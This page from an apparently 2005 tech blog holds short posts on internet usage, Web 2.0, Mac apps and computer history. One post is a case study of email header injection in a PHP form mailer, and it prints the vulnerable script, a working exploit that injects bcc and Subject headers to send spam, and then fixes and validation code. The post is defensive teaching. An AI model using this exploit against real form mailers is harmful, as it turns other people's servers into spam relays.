December 29, 2005
Internet: The Great Equalizer
Recent Survey results from the Pew Internet & American Life Project reveal that the gap between number of male and female users of the Internet is closing. Young women (between 18 and 29) are actually more likely to web surf than males of the same age.
Surfing through other news stories that cover these results is also kind of fun.
Posted by Martin at 05:32 PM | Comments (1)
December 23, 2005
Video: Geek Stoplight
Subscribe in iTunes | Watch Quicktime
That's right folks... TechEvangelists is videoblogging! We aim to document and explore whatever tickles our tech-art fancy, including interviews with both under-the-radar tinkerers and your favorite Web 2.0 luminaries. For our debut video, we turned inward to our own Matt Gray (bio | blog). He bought an old stoplight on eBay and, out of sheer boredom, decided he wanted to control it with a computer. A party machine is born.
Matt promises to provide a step-by-step outline after the holidays, including schematics and the script controlling how the stoplight responds to music input.
Posted by colsen at 02:33 AM | Comments (1)
December 18, 2005
Web 2.0 Roundup
For my money, the biggest online developments this year were podcasting and vlogs. Anyone can create and distribute media, globally, for free. Pretty big deal I'd say. iTunes support of podcasting and videoblogging was of course a huge boost to bringing media-casting to the mainstream. Does that qualify as Web 2.0? I don't think iTunes itself qualifies, but rich services such as Odeo and Mefeedia are innovative and user-driven - tasty Web 2.0 qualities.
Meanwhile...
Top Ten Web 2.0 Moments of 2005
Top 10 Innovative Web 2.0 Applications of 2005
The Best Web 2.0 Software of 2005
Five Reasons Why Web 2.0 Matters
Web 2.0? It doesn't exist
Web 2.0 Dead?
Is content king?
Posted by colsen at 04:16 AM | Comments (0)
December 16, 2005
10 for X
10 for X: Ten software titles for Mac OS X you must have
Some familiar apps here, but a few I've never heard of. I often end up using TextEdit to jot notes down when talking on the phone, or for ideas that (occasionally) pop into my head. Of course TextEdit offers no organization for notes, so I'm checking out Notational Velocity which automagically saves and indexes anything you write.
Posted by colsen at 12:03 PM | Comments (0)
December 14, 2005
Form Mailer SPAM: Exploit, Example.
Mailing a form's fields to one or more e-mail addresses is a common task; unfortunately, the single-script solutions people drop in to do it often turn the web server into an open mail relay. Read on for a quick case study of a single PHP script that was hijacked to send SPAM.
Original Source
This particular vulnerable script was written to receive POSTs from a single web form, with a single field: "email".
1  <?php
2  $email = $_POST['email'];
3
4  $message = "subscribe $email";
5  $subject = "";
6  $recipient = "somelist-request@mailman.example.com";
7
8  if( preg_match( "/@/", $email ) )
9      mail( $recipient, $subject, $message, "From: $email\r\n" );
10
11 header( "Location: http://www.example.com/thanks/" );
12 ?>
The script is simple enough: it retrieves a key from the browser's POST (line 2), builds a one-line e-mail to the "somelist" mailman list subscription address, and sends it on its way.
Note that the only validation performed (line 8) is a check for the presence of an '@' character; nothing restricts what else the field may contain.
Exploit
<?php

$site = 'www.example.com';
$url = '/sign-up/';

// The "email" field: a leading CRLF ends the From: header early, the
// following lines become new headers, and the blank line starts a body.
$exploit_text = "\r\n".
    "bcc: youremail@example.com\r\n".
    "Subject: This is SPAM.\r\n".
    "From: \"Spammer\" <youremail@example.com>\r\n".
    "\r\n".
    "This mail script is utterly exploited.\r\n";

$req = 'email='.urlencode( stripslashes( $exploit_text ) );

// Hand-built HTTP/1.0 POST, exactly what a browser would send for the form.
$header  = 'POST '.$url." HTTP/1.0\r\n";
$header .= "Host: $site\r\n";
$header .= "Content-Type: application/x-www-form-urlencoded\r\n";
$header .= "Content-Length: ".strlen( $req )."\r\n\r\n";

$fp = fsockopen( $site, 80, $errno, $errstr, 30 );

if ( ! $fp ) {
    echo "ERROR: $errno, $errstr\n";
    exit;
}

fputs( $fp, $header.$req );

$results = '';
while ( ! feof( $fp ) ) {
    $results .= fgets( $fp, 1024 );
}

echo "\n\nResult: $results\n";

fclose( $fp );

echo "DONE\n";

?>
This script is slightly more complex, but simple enough to demonstrate the flaw in the first code snippet. It constructs a well-formed POST and sends it directly to www.example.com's web server on port 80, bypassing the HTML form entirely.
Notice that the exploit text injects \r\n, the carriage return / line feed sequence that separates one header line from the next in the message handed to sendmail. Why does this exploit the first script?
9 mail( $recipient, $subject, $message, "From: $email\r\n" );
The signature of PHP's mail( ) function is as follows:
bool mail ( string to, string subject, string message [, string additional_headers [, string additional_parameters]] )
In this case, form data from the user ($_POST['email']) is concatenated directly into the e-mail's final headers. If $email contains \r\n sequences followed by more headers (as in $exploit_text), those headers will be added to the real message, and a \r\n\r\n sequence ends the header block so that whatever follows becomes the message body.
In this case, I simply add a bcc: header line, a subject, a From: field, and the spam email's text.
Solution
1  <?php
2  $email = $_POST['email'];
3
4  $email = preg_replace( "/[\r\n]/", '', $email );
5
6  $message = "subscribe $email";
7  $subject = "";
8  $recipient = "somelist-request@mailman.example.com";
9
10 if( preg_match( "/@/", $email ) )
11     mail( $recipient, $subject, $message, "From: $email\r\n" );
12
13 header( "Location: http://www.example.com/thanks/" );
14 ?>
Line 4 solves the immediate problem: all carriage returns (\r) and newlines (\n) are stripped from the untrusted user data before it is passed into the mail function's headers. Without a line break, nothing the attacker sends can start a new header, so this simple enhancement is enough to prevent this particular exploit.
Stripping only closes the header-injection hole, though. The field still reaches the message body unvalidated, and a request containing \r or \n never came from the real form, so rejecting such a request outright is the safer habit than quietly cleaning it. There are many other ways to improve the validation on this script, such as checking the e-mail address according to RFC 2822.
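To make the mechanism concrete, here is an added example (my code, not the original post's scripts) that places the vulnerable assembly beside a hardened one. assemble_mail() mimics the order in which PHP's mail() hands a message to sendmail (To, Subject, the additional headers verbatim, a blank line, then the body); that order is a simplification of what the real MTA and mailman then do with it. The exploit payload is the one from the post, reconstructed as a constant; the address pattern, the 254-character limit and the function names are my own choices.

```python
"""Header injection through PHP-style mail(): vulnerable assembly beside a hardened check.

Added example, not code from the original post. assemble_mail() is a model of
PHP's sendmail path (To, Subject, additional_headers, blank line, body); the
receiving side is modelled with the standard-library email parser.
"""
import re
from email import message_from_string
from email.message import Message
from typing import Optional

LIST_ADDRESS = "somelist-request@mailman.example.com"

# The post's exploit payload, reconstructed here as a constant (constructed input).
EXPLOIT_TEXT = (
    "\r\n"
    "bcc: youremail@example.com\r\n"
    "Subject: This is SPAM.\r\n"
    'From: "Spammer" <youremail@example.com>\r\n'
    "\r\n"
    "This mail script is utterly exploited.\r\n"
)


def assemble_mail(to: str, subject: str, message: str, additional_headers: str) -> str:
    """Return the raw text that mail() would pipe to sendmail.

    additional_headers is copied verbatim, so any CR/LF it contains lands in the
    header section unchanged (this is the whole bug).
    """
    return f"To: {to}\nSubject: {subject}\n{additional_headers}\n\n{message}\n"


def vulnerable_subscribe(email: str) -> str:
    """Mirror the original script: only the presence of '@' is checked."""
    if "@" not in email:
        return ""
    return assemble_mail(LIST_ADDRESS, "", f"subscribe {email}", f"From: {email}\r\n")


def parse_headers(raw: str) -> Message:
    """Parse the assembled text the way a receiving MTA would (header block, then body)."""
    return message_from_string(raw)


# Assumed policy for a subscription form: one plain mailbox, letters/digits and a
# few punctuation characters, at least one dot in the domain. Not full RFC 2822.
ADDRESS_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def validate_address(email: str) -> Optional[str]:
    """Return the address if it is a single well-formed mailbox, else None.

    Rejecting (rather than stripping) control characters means a tampered
    request never reaches mail() at all, and nothing derived from it carries
    the taint into the headers or the body.
    """
    if len(email) > 254:
        return None
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in email):
        return None  # CR, LF or another control character: injection attempt
    if not ADDRESS_RE.fullmatch(email):
        return None
    return email


def hardened_subscribe(email: str) -> Optional[str]:
    """Same mail as vulnerable_subscribe, but only for an address that passed validation."""
    address = validate_address(email)
    if address is None:
        return None
    return assemble_mail(LIST_ADDRESS, "", f"subscribe {address}", f"From: {address}\r\n")


if __name__ == "__main__":
    msg = parse_headers(vulnerable_subscribe(EXPLOIT_TEXT))
    print("Bcc as seen by the MTA:", msg["Bcc"])
    print("Subject headers:", msg.get_all("Subject"))
    print("Hardened result for the payload:", hardened_subscribe(EXPLOIT_TEXT))
```

Running the vulnerable path on the payload and parsing the result shows a Bcc header the script never wrote and a second Subject line, with the spam text as the body; the hardened path returns None for the same input and only passes through a single, line-break-free address.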
Defensive design
In order to mitigate these sorts of attacks, all form data should be considered "tainted": lacking rigorous validation, it should not be inserted into an SQL statement, a mail command (especially the headers), and CERTAINLY NOT into an exec( ) or system( ) command!
When data is tainted, anything derived from that data acquires the taint. That is, one should be careful to trace the progress of unvalidated user data all the way from the $_GET / $_POST variables into whatever composite variables and arrays are built from them later; in the script above, $email flows into both $message and the From: header.
The above appears obvious, but I assert that every programmer has written exploitable code. I hope that this concrete example will help some programmers write less exploitable code. Even "simple" code can be exploited by a knowledgeable attacker. Please keep this in mind the next time you deploy a band-aid script solution; never assume that your only source of form data is the actual web page's form.
Posted by Matt at 02:13 PM | Comments (0)
December 12, 2005
Web Development as acted out by toys
PingMag recently posted an article about The Web Development Process. It's pretty standard as far as process goes, but what's interesting are these cute illustrations.[Via Matt.]
Posted by Martin at 11:39 AM | Comments (0)
December 07, 2005
Just Plain Cool

Check out this video of Xmas lights sequenced to music. It's freakin' cool.
Posted by colsen at 02:45 AM | Comments (0)
December 06, 2005
Good Question
How was Napoleon important to the development of the modern computer? That kind of question is typical of James Burke, host of the well-known Connections television series. You'll be able to find the answer to this and many other trails of connected thought on his forthcoming KnowledgeWeb project. Burke and his collaborators are creating a database with "almost infinite number of paths of exploration among people, places, things, and events." A smart web within the web.
Posted by colsen at 11:41 AM | Comments (0)
December 04, 2005
Apple's Swedish Connection
Ever wonder how Apple came up with the Command key symbol? Me neither, but here's the story. The Swedes use it to indicate an interesting feature or attraction. Over 20 years later, there's still a little Swedish campground in our shiny new Macs.
More computer history: The first video game
Posted by colsen at 12:56 AM | Comments (0)